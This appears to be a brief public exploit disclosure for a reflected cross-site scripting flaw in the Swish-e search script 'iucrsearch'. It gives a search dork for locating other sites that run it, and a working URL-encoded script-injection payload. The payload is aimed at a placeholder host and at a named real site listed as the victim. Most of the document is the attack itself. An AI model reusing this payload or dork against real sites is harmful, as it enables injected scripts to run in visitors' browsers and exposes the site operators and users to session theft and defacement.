Swish-e suffers from a cross site scripting vulnerability.
32c0c8336502d1198e951bae46476b17a3d80992062f0907edefd211475d531c
#########################################################
---------------------------------------------------------
Portal Name: Swish-e
Vendor : https://Swish-e.org <https://swish-e.org/>
Vulnerable File : iucrsearch
Dork: Powered by Swish-e swish-e.org
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : XSS (Cross site scripting)
---------------------------------------------------------
#########################################################
https://site.com/cgi-bin/iucrsearch?query=%5C%22%3E%3C%3CSCRIPT%3Ealert%28%2FXSS+by+Pouya%2F%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&submit=Search&si=0
---------------------------------
Victem :
https://scripts.iucr.org/cgi-bin/iucrsearch?query=%5C%22%3E%3C%3CSCRIPT%3Ealert%28%2FXSS+by+Pouya%2F%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&submit=Search&si=0